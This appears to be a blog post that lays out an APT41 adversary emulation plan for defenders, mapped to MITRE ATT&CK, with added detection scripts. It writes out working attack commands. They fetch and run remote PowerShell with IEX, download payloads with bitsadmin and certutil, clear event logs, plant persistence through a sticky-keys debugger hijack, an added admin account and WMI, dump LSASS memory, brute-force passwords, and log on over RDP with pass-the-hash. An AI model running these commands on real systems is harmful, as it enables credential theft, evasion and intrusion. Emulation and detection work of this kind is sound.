APT41 Emulation Plan


I recently blogged about hunting for techniques used by APT41, but that post only covered a few techniques. Since I wanted to expand on it, I decided to create an emulation plan for Blue Teamers.

The main reason behind this blog post is that I was inspired by the MITRE Engenuity Center for Threat-Informed Defense (Center) releasing their emulation plan for FIN6. That emulation plan can be found here.

The set-up and layout of this blog post are inspired by the Center's FIN6 plan, so credits to them for providing such a great template.

APT41 is a group that carries out Chinese state-sponsored espionage activity in addition to financially motivated activity.

The US says that APT41 orchestrated intrusions at more than 100 companies across the world, ranging from software vendors and video gaming companies to telcos and more.

Source: Advanced Persistent Threat Groups (APT Groups) | FireEye


This emulation plan is based on publicly available information. Everything is provided in such a way that anyone is able to execute it. All the information about the techniques used comes from MITRE ATT&CK.

Source: https://attack.mitre.org/groups/G0096/

Keep in mind that it is difficult to know exactly which steps were taken, so I don't claim that this is the exact way the adversaries operate.

Step 1 – APT41 Initial Access

They usually start by sending spear-phishing e-mails to their victims with an attachment, such as a compiled HTML file (.chm). There is no command to run for this step; it is the assumed entry point for everything that follows.

Step 2 – Discovery

Once the group has obtained a foothold on a compromised machine, they start using built-in Windows functionality to perform reconnaissance and gather information about the system and network configuration.


2.1 – System Owner/User Discovery (T1033)

Get the username of the account running on the victim machine.


2.2 – System Network Configuration Discovery (T1016)

Get the MAC address (and the rest of the network configuration) of the victim machine.

ipconfig /all

2.3 – System Network Connections Discovery (T1049)

List network connections to or from the compromised system.

# Show all TCP connections numerically (no DNS resolution) together with the owning process ID.
# (On Windows, -t shows the offload state rather than "TCP", so the Linux-style "netstat -ant" is not what you want here.)
netstat -ano -p tcp

# Display the contents of the IP routing table (equivalent to the route print command).
netstat -r

2.4 – System Network Connections Discovery (T1049)

Enumerate active RDP sessions on the local and remote hosts.

# C:\Temp must already exist (mkdir C:\Temp), otherwise -OutFile fails
Invoke-WebRequest https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/dev/Recon/PowerView.ps1 -OutFile C:\Temp\PowerView.ps1

cd C:\Temp

Import-Module .\PowerView.ps1

# Return all active RDP sessions on localhost (the default for -ComputerName)
Get-NetRDPSession

# Return all active RDP sessions on the Domain Controllers
Get-DomainController | Get-NetRDPSession

# Return all active RDP sessions on a remote server
Get-NetRDPSession -ComputerName "remoteserver"

2.5 – Network Share Discovery (T1135)

List shares on the local and remote hosts.

# List all shares on the local host
net share

# List all shares on a remote host
net view \\remotesystem

# PowerView version
Invoke-WebRequest https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/dev/Recon/PowerView.ps1 -OutFile C:\Temp\PowerView.ps1

cd C:\Temp

Import-Module .\PowerView.ps1

# Return active shares on the local host (the default for -ComputerName)
Get-NetShare

# Return active shares on a remote host
Get-NetShare -ComputerName remoteserver

# Return all shares for every domain-joined computer
Get-DomainComputer | Get-NetShare

2.6 – Network Service Scanning (T1046)

List all subnets in AD; the result is the target list for any subsequent network service scanning.

# Use an LDAP search to enumerate all subnets in AD (replace DC=contoso,DC=com with your forest root)
$ChildItems = ([ADSI]"LDAP://CN=Subnets,CN=Sites,CN=Configuration,DC=contoso,DC=com"); $ChildItems.psbase.Children | Format-Table name, Description, whenCreated

# Use the .NET ActiveDirectory classes to enumerate all subnets in the current forest (no DN needed)
[System.DirectoryServices.ActiveDirectory.Forest]::GetCurrentForest().Sites | ForEach-Object { $_.Subnets } | Format-Table Name, Site, Location

2.7 – Domain Trust Discovery (T1482)

Adversaries may attempt to gather information on domain trust relationships that may be used to identify lateral movement opportunities in Windows multi-domain/forest environments.

nltest /domain_trusts > ad_trustdmp.txt

2.8 – Permission Groups Discovery: Domain Groups (T1069.002)

APT41 used the net.exe utility to enumerate the Domain Admins group.

net group "Domain Admins" /domain
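The commands in 2.1 to 2.8 are all built-in tools, so for a Blue Teamer the interesting question is what they look like in the logs. The following hunt is an added example (not part of the original post or of any APT41 tooling): it reads Security 4688 process-creation events and reports a parent process that spawned several different discovery tools within a short window, which is how running through this plan from one shell or implant appears. It assumes that "Audit Process Creation" and "Include command line in process creation events" are enabled, and the ParentProcessName field is only populated on Windows 10 / Server 2016 and later; the tool list and the 3-tools-in-5-minutes threshold are my own choices.

```powershell
# Hunt for bursts of discovery commands in Security 4688 (process creation) events.
# Assumes "Audit Process Creation" and "Include command line in process creation events"
# are enabled; ParentProcessName is only populated on Windows 10 / Server 2016 and later.

# Built-in tools the discovery steps above spawn (NewProcessName is a full path, hence the leading '\\').
# net.exe hands most of its work to net1.exe, so both are matched.
$DiscoveryRegex = '\\(whoami|ipconfig|netstat|nltest|net1?|systeminfo|query|qwinsta)\.exe$'

function Get-ProcessCreationEvents {
    param([int]$Hours = 24)
    $filter = @{ LogName = 'Security'; Id = 4688; StartTime = (Get-Date).AddHours(-$Hours) }
    Get-WinEvent -FilterHashtable $filter -ErrorAction SilentlyContinue | ForEach-Object {
        # Address the event fields by name instead of by Properties[] index, which differs between OS versions
        $d = @{}
        foreach ($n in ([xml]$_.ToXml()).Event.EventData.Data) { $d[$n.Name] = $n.'#text' }
        [pscustomobject]@{
            Time        = $_.TimeCreated
            User        = "$($d['SubjectDomainName'])\$($d['SubjectUserName'])"
            ParentPid   = $d['ProcessId']          # creator PID, stored as a hex string
            Parent      = $d['ParentProcessName']
            Image       = $d['NewProcessName']
            CommandLine = $d['CommandLine']
        }
    }
}

function Find-DiscoveryBursts {
    param([int]$Hours = 24, [int]$WindowMinutes = 5, [int]$MinDistinctTools = 3)
    $hits = Get-ProcessCreationEvents -Hours $Hours | Where-Object { $_.Image -match $DiscoveryRegex }
    # One shell or implant running through the plan shows up as one parent spawning several tools in a row
    foreach ($group in ($hits | Group-Object ParentPid, Parent)) {
        $sorted = @($group.Group | Sort-Object Time)
        $tools  = @($sorted | ForEach-Object { [System.IO.Path]::GetFileName($_.Image).ToLower() } | Select-Object -Unique)
        $span   = New-TimeSpan -Start $sorted[0].Time -End $sorted[-1].Time
        if ($tools.Count -ge $MinDistinctTools -and $span.TotalMinutes -le $WindowMinutes) {
            [pscustomobject]@{
                First    = $sorted[0].Time
                Last     = $sorted[-1].Time
                User     = $sorted[0].User
                Parent   = "$($sorted[0].Parent) (pid $($sorted[0].ParentPid))"
                Tools    = $tools -join ', '
                Commands = @($sorted.CommandLine | Select-Object -Unique) -join ' | '
            }
        }
    }
}

# Usage: run elevated on the host where the discovery steps were executed
Find-DiscoveryBursts -Hours 24 | Format-List
```

The grouping is deliberately simple: one window per parent process, so a long-lived parent such as explorer.exe that spawns discovery tools over hours will not be flagged, while a cmd.exe or powershell.exe that runs whoami, ipconfig, netstat, net and nltest back to back will. PowerView itself never shows up here because it runs inside the existing PowerShell process; that activity has to be found in PowerShell script block logging (Event ID 4104) instead.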

Step 3 – Execution

In this step, the adversaries are downloading and executing malware on the victim machine.

3.1 – Command and Scripting Interpreter: PowerShell (T1059.001)

FireEye covered in their blog post that APT41 leveraged PowerShell to download and execute their malware.

Source: https://www.fireeye.com/blog/threat-research/2020/03/apt41-initiates-global-intrusion-campaign-using-multiple-exploits.html

This is not exactly the way APT41 did it, but here is a similar approach: download a script and run it in memory without touching disk.

powershell.exe -exec Bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Kerberoast.ps1');Invoke-Kerberoast -OutputFormat Hashcat"

3.2 – Windows Management Instrumentation (T1047)

APT41 used the WMIEXEC utility to execute whoami commands on remote machines.

Invoke-WebRequest https://raw.githubusercontent.com/OneScripter/WmiExec/master/WmiExec.ps1 -OutFile C:\Temp\WmiExec.ps1

cd C:\Temp

.\WmiExec.ps1 -ComputerName remotesystem -Command "whoami"

Step 4 – Defense Evasion

Defense Evasion consists of techniques that adversaries use to avoid detection throughout their compromise.

4.1 – BITS Jobs (T1197)

Leveraging the Microsoft BITSAdmin command-line tool to download payloads.

# bitsadmin needs a job name (here "bbbb") and absolute paths
bitsadmin /transfer bbbb https://raw.githubusercontent.com/HarmJ0y/ASREPRoast/master/ASREPRoast.ps1 C:\Temp\ASREPRoast.ps1

# PowerShell version (Start-BitsTransfer)
powershell -windowstyle hidden -ExecutionPolicy ByPass -NoProfile Start-BitsTransfer -Source https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Kerberoast.ps1 -Destination C:\Temp\Invoke-Kerberoast.ps1

4.2 – Indirect Command Execution (T1202)

APT41 used certutil to download additional files.

certutil -urlcache -split -f https://raw.githubusercontent.com/BloodHoundAD/BloodHound/master/Ingestors/SharpHound.ps1 C:\Temp\SharpHound.ps1

4.3 – Indicator Removal on Host: Clear Windows Event Logs (T1070.001)

APT41 attempted to remove evidence of some of its activity by clearing the Windows Security and System event logs.

# Run CMD as admin

wevtutil cl security

wevtutil cl system

# Clearing is itself logged: Security records Event ID 1102 and System records Event ID 104 as the first entry after the clear.
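Each of the techniques in 4.1 to 4.3 leaves an artefact that survives the action itself, and the following script is an added example (mine, not from the original post) that collects them on the emulated host: BITS transfer jobs with their URL from the Microsoft-Windows-Bits-Client/Operational log (Event IDs 59 and 60), the URLs certutil kept in its URL cache, and the Security 1102 / System 104 events written when a log is cleared. It assumes the BITS operational log is enabled (the default) and that the script runs elevated; the allow-list regex used to drop Windows Update noise is a crude placeholder that you will want to adapt.

```powershell
# Hunt for the traces left by 4.1 - 4.3: BITS transfer jobs, the certutil URL cache and cleared event logs.
# Assumes the Microsoft-Windows-Bits-Client/Operational log is enabled (it is by default).

function Get-BitsTransfers {
    param([int]$Hours = 24)
    # 59 = BITS started a transfer job, 60 = BITS stopped transferring; both carry the remote URL
    $filter = @{ LogName = 'Microsoft-Windows-Bits-Client/Operational'; Id = 59, 60; StartTime = (Get-Date).AddHours(-$Hours) }
    Get-WinEvent -FilterHashtable $filter -ErrorAction SilentlyContinue | ForEach-Object {
        $d = @{}
        foreach ($n in ([xml]$_.ToXml()).Event.EventData.Data) { $d[$n.Name] = $n.'#text' }
        [pscustomobject]@{ Time = $_.TimeCreated; EventId = $_.Id; Job = $d['name']; Url = $d['url'] }
    } |
    # Crude noise filter for Windows Update / Store / Edge traffic; replace it with your own allow-list
    Where-Object { $_.Url -and $_.Url -notmatch '\.(microsoft|windowsupdate|msedge)\.(com|net)' }
}

function Get-CertutilUrlCache {
    # 'certutil -urlcache' with no URL argument lists every entry in the current user's URL cache,
    # including files fetched with -urlcache -split -f
    certutil.exe -urlcache 2>$null | ForEach-Object {
        $m = [regex]::Match($_, 'https?://\S+')
        if ($m.Success) { $m.Value }
    } | Select-Object -Unique
}

function Get-LogClearEvents {
    param([int]$Hours = 24)
    $since = (Get-Date).AddHours(-$Hours)
    # Security 1102 = the audit log was cleared, System 104 = a log file was cleared. 'wevtutil cl' cannot
    # suppress them because each is written as the first record of the log after it has been cleared.
    $queries = @(
        @{ LogName = 'Security'; Id = 1102; StartTime = $since },
        @{ LogName = 'System';   Id = 104;  StartTime = $since }
    )
    foreach ($q in $queries) {
        Get-WinEvent -FilterHashtable $q -ErrorAction SilentlyContinue | ForEach-Object {
            # These two events keep their fields under <UserData><LogFileCleared>, not <EventData>
            $x = ([xml]$_.ToXml()).Event.UserData.LogFileCleared
            [pscustomobject]@{
                Time    = $_.TimeCreated
                Log     = $q.LogName
                EventId = $_.Id
                Cleared = if ($x.Channel) { $x.Channel } else { 'Security' }
                User    = "$($x.SubjectDomainName)\$($x.SubjectUserName)"
            }
        }
    }
}

# Usage: run elevated on the emulated host after executing steps 4.1 - 4.3
Get-BitsTransfers    | Format-Table -AutoSize
Get-CertutilUrlCache
Get-LogClearEvents   | Format-Table -AutoSize
```

If the Security log was cleared, the 1102 event will be the oldest record in it, which is the quickest way to confirm the clear happened without knowing when. The certutil cache is per user, so run the check as the user whose session was used for 4.2.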

4.4 – Indicator Removal on Host: Clear Command History (T1070.003)

APT41 attempted to remove evidence of some of its activity by deleting Bash histories (Linux).

history -c

Step 5 – Persistence

Persistence consists of techniques that adversaries use to keep access to a victim system.

5.1 – Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder (T1547.001)

APT41 added a registry key in HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost to establish persistence for Cobalt Strike. This value only registers a new svchost service group; the service that runs in that group is created in 5.2.

reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost" /v "StorSyncSvc" /t REG_MULTI_SZ /d "StorSyncSvc" /f

5.2 – Create or Modify System Process: Windows Service (T1543.003)

APT41 created the StorSyncSvc service to provide persistence for Cobalt Strike.

# The svchost.exe -k argument must be inside the same quotes as the binary path
sc create "StorSyncSvc" binPath= "%SystemRoot%\system32\svchost.exe -k StorSyncSvc" type= share start= auto error= ignore DisplayName= "StorSyncSvc"

# Without a Parameters\ServiceDll value the service fails to start; what this step emulates is the
# service-creation artefact (System Event ID 7045) and the registry entries, not a working payload.

# PowerShell version
New-Service -BinaryPathName C:\Windows\System32\cmd.exe -Name APT41 -DisplayName APT41 -StartupType Automatic

5.3 – Scheduled Task/Job: Scheduled Task (T1053.005)

APT41 used a compromised account to create a scheduled task on a system.

schtasks /create /tn "NotAVirus" /tr C:\Windows\System32\calc.exe /sc minute /mo 1

5.4 – Event Triggered Execution: Accessibility Features (T1546.008)

APT41 leveraged sticky keys to establish persistence.

# Registering cmd.exe as the "debugger" for sethc.exe (Shift five times) and utilman.exe (Ease of Access button)
# means that triggering either on the logon screen launches cmd.exe as SYSTEM.
REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /t REG_SZ /v Debugger /d "C:\windows\system32\cmd.exe" /f
REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\utilman.exe" /t REG_SZ /v Debugger /d "C:\windows\system32\cmd.exe" /f

5.5 – Create Account: Local Account (T1136.001)

APT41 created user accounts and added them to the User and Admin groups.

# Create local account
net user APT41 MyCrappyPassw0rd! /add

# Add local account to the Built-in Administrators group
net localgroup Administrators APT41 /add

5.6 – Windows Management Instrumentation (T1047)

APT41 used WMI in several ways, including for execution of commands via WMIEXEC as well as for persistence.

# Run PowerShell as admin

Invoke-WebRequest https://raw.githubusercontent.com/subesp0x10/Wmi-Persistence/master/WMI-Persistence.ps1 -OutFile C:\Temp\WMI-Persistence.ps1

cd C:\Temp

Import-Module .\WMI-Persistence.ps1

Install-Persistence -Trigger Startup -Payload "c:\windows\system32\calc.exe"
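After running 5.1 to 5.6, the Blue Team side of the exercise is to find what was planted. The script below is an added example (my own, not from the original post or from the Wmi-Persistence project) that audits the locations those steps touch: svchost-hosted services whose group is not registered under the Svchost key or whose ServiceDll is missing, outside System32 or not validly signed (5.1 and 5.2), Debugger values under Image File Execution Options (5.4), the members of the local Administrators group (5.5) and permanent WMI event subscriptions in root\subscription (5.6). It assumes an elevated Windows PowerShell 5.1 session, because Get-WmiObject is not available in PowerShell 7, and it reports candidates for review rather than verdicts.

```powershell
# Audit the persistence locations used in 5.1, 5.2, 5.4, 5.5 and 5.6.
# Run in an elevated Windows PowerShell 5.1 session (Get-WmiObject is not available in PowerShell 7).

function Get-SuspiciousSvchostServices {
    # A svchost-hosted service needs a group registered under the Svchost key (5.1) and a
    # Parameters\ServiceDll value; an unregistered group, a missing DLL or a DLL outside System32 is worth a look
    $svchostKey = 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost'
    $groups = (Get-Item $svchostKey).GetValueNames()
    foreach ($svc in Get-ChildItem 'HKLM:\SYSTEM\CurrentControlSet\Services') {
        $image = (Get-ItemProperty $svc.PSPath -ErrorAction SilentlyContinue).ImagePath
        if (-not $image -or $image -notmatch 'svchost\.exe\s+-k\s+"?([^"\s]+)') { continue }
        $group = $Matches[1]
        $dll = (Get-ItemProperty "$($svc.PSPath)\Parameters" -ErrorAction SilentlyContinue).ServiceDll
        $reasons = @()
        if ($group -notin $groups) { $reasons += "group '$group' is not registered under the Svchost key" }
        if (-not $dll) {
            $reasons += 'no Parameters\ServiceDll (the service cannot start under svchost)'
        } else {
            $dllPath = [Environment]::ExpandEnvironmentVariables($dll)
            if ($dllPath -notlike "$env:SystemRoot\System32\*") { $reasons += "ServiceDll outside System32: $dllPath" }
            elseif ((Test-Path $dllPath) -and (Get-AuthenticodeSignature $dllPath).Status -ne 'Valid') { $reasons += "ServiceDll not validly signed: $dllPath" }
        }
        if ($reasons) { [pscustomobject]@{ Service = $svc.PSChildName; Group = $group; ImagePath = $image; Reasons = $reasons -join '; ' } }
    }
}

function Get-IfeoDebuggers {
    # 5.4: a Debugger value under an Image File Execution Options subkey runs that program instead of the image
    $base = 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options'
    foreach ($k in Get-ChildItem $base) {
        $dbg = (Get-ItemProperty $k.PSPath -ErrorAction SilentlyContinue).Debugger
        if ($dbg) { [pscustomobject]@{ Image = $k.PSChildName; Debugger = $dbg } }
    }
}

function Get-LocalAdministrators {
    # 5.5: every member of the built-in Administrators group; accounts created with 'net user' show PrincipalSource = Local
    Get-LocalGroupMember -Group 'Administrators' | Select-Object Name, ObjectClass, PrincipalSource
}

function Get-WmiPersistence {
    # 5.6: a permanent subscription is a filter (when), a consumer (what) and a binding between the two
    $ns = 'root\subscription'
    $filters   = @(Get-WmiObject -Namespace $ns -Class __EventFilter)
    $consumers = @(Get-WmiObject -Namespace $ns -Class __EventConsumer)   # base class, returns every consumer type
    foreach ($b in Get-WmiObject -Namespace $ns -Class __FilterToConsumerBinding) {
        # Filter and Consumer are relative object paths such as __EventFilter.Name="x"; match them back by name
        $f = $filters   | Where-Object { $b.Filter   -like "*Name=`"$($_.Name)`"*" }
        $c = $consumers | Where-Object { $b.Consumer -like "*Name=`"$($_.Name)`"*" }
        [pscustomobject]@{
            Filter   = $f.Name
            Query    = $f.Query
            Consumer = "$($c.__CLASS) $($c.Name)"
            Action   = if ($c.CommandLineTemplate) { $c.CommandLineTemplate } else { $c.ScriptText }
        }
    }
}

"== svchost-hosted services to review ==";  Get-SuspiciousSvchostServices | Format-Table -AutoSize -Wrap
"== IFEO Debugger values ==";               Get-IfeoDebuggers             | Format-Table -AutoSize
"== Local Administrators ==";               Get-LocalAdministrators       | Format-Table -AutoSize
"== WMI event subscriptions ==";            Get-WmiPersistence            | Format-List
```

Against this plan the output is predictable: StorSyncSvc is reported with "no Parameters\ServiceDll", sethc.exe and utilman.exe appear with cmd.exe as Debugger, the APT41 account shows up in Administrators, and the subscription created by Install-Persistence is listed with its query and its calc.exe command line. On a real host expect some noise in the svchost check (vendor services with DLLs outside System32), which is why it reports reasons rather than a verdict.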

Step 6 – Credential Access

Credential Access consists of techniques for stealing credentials like account names and passwords.

6.1 – OS Credential Dumping: LSASS Memory (T1003.001)

Dump the memory of the LSASS process using the MiniDump export of comsvcs.dll; the password hashes are then extracted from the dump offline.

# Run PowerShell as admin (the MiniDump call needs SeDebugPrivilege)

# Look up the PID of lsass instead of hard-coding it
$lsassPid = (Get-Process lsass).Id

rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump $lsassPid C:\Temp\lsass.dmp full

6.2 – Brute Force: Password Cracking (T1110.002)

APT41 performed password brute-force attacks on the local admin (RID-500) account.

Note that the nishang module used here guesses passwords online against the target (T1110.001, Password Guessing) rather than cracking dumped hashes offline, so every attempt produces a failed-logon event (4625) on the target if logon auditing is enabled.

Invoke-WebRequest https://raw.githubusercontent.com/samratashok/nishang/master/Scan/Invoke-BruteForce.ps1 -OutFile C:\Temp\Invoke-BruteForce.ps1

cd C:\Temp

Import-Module .\Invoke-BruteForce.ps1

Invoke-BruteForce -ComputerName victimmachine -UserList C:\Temp\users.txt -PasswordList C:\Temp\wordlist.txt -Service LocalAccounts -StopOnSuccess -Verbose

Step 7 – Lateral Movement

Lateral Movement consists of techniques that adversaries use to enter and control remote systems on a network.

7.1 – Remote Services: Remote Desktop Protocol (T1021.001)

APT41 used RDP for lateral movement.

One way to perform this is with xfreerdp, the client that ships with the FreeRDP project and is packaged by most Linux distributions (it is not part of the base system), which supports pass-the-hash over RDP.

This requires Restricted Admin mode on the target, which is available on:

  • Windows 8.1 / Windows Server 2012 R2 and later
  • Windows 7 / Windows Server 2008 R2 with KB2871997 installed

Restricted Admin mode is disabled by default; enabling it is nothing more than a registry key flip (DWORD DisableRestrictedAdmin = 0 under HKLM\SYSTEM\CurrentControlSet\Control\Lsa).

# /pth takes the NT hash of the account; /d:. selects a local account
xfreerdp /u:admin /d:. /pth:<NT-hash> /v:TARGET
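The "registry key flip" is the part that has to happen on the target before the xfreerdp command above works. The following is an added example (mine, not from the original post) that reads the current state of the DisableRestrictedAdmin value, enables Restricted Admin mode for the lab, and removes the value again afterwards; it assumes an elevated session on the target and that the value is absent by default, which is the state in which Restricted Admin logons are refused.

```powershell
# Check, and in a lab enable, Restricted Admin mode on the RDP target. Run elevated on the target.
$LsaKey = 'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa'

function Get-RestrictedAdminState {
    $v = (Get-ItemProperty -Path $LsaKey -Name DisableRestrictedAdmin -ErrorAction SilentlyContinue).DisableRestrictedAdmin
    # The value is absent by default, which means Restricted Admin logons are refused; 0 accepts them
    if ($null -eq $v) { return 'Disabled (value absent, the default)' }
    if ($v -eq 0)     { return 'Enabled' }
    return 'Disabled'
}

function Enable-RestrictedAdmin {
    New-ItemProperty -Path $LsaKey -Name DisableRestrictedAdmin -Value 0 -PropertyType DWord -Force | Out-Null
}

function Disable-RestrictedAdmin {
    # Removing the value restores the default, so the target refuses pass-the-hash RDP logons again
    Remove-ItemProperty -Path $LsaKey -Name DisableRestrictedAdmin -ErrorAction SilentlyContinue
}

"Before: $(Get-RestrictedAdminState)"
Enable-RestrictedAdmin
"After:  $(Get-RestrictedAdminState)"
# Disable-RestrictedAdmin   # run once the exercise is over
```

Two things to keep in mind when you flip this on: a Restricted Admin session does not hold the user's credentials on the target (outbound connections from it authenticate as the machine account), which is why Microsoft introduced it as a hardening feature, and it is exactly that property that makes an NT hash sufficient to log on, which is why it is commonly left disabled. Turn it back off when the emulation is done.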





